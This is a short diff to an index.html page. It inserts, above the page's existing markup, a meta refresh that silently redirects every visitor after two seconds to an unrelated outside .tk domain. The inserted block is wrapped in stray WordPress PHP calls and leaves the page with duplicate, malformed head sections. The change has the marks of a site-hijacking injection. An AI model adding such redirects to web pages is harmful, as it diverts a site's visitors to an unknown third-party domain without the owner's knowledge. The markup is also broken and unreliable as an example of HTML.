--- a/index.html
+++ b/index.html
@@ -1,3 +1,13 @@
+
+<!DOCTYPE html>
+<head>
+    <meta charset="utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta http-equiv="refresh" content="2;url=https://lhlechxanh.tk/">
+    <?php wp_head(); ?>
+</head>
+<body <?php body_class(); ?>>
+<div class="wrapper cleafix">
 <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system">
   <head>
 <table>
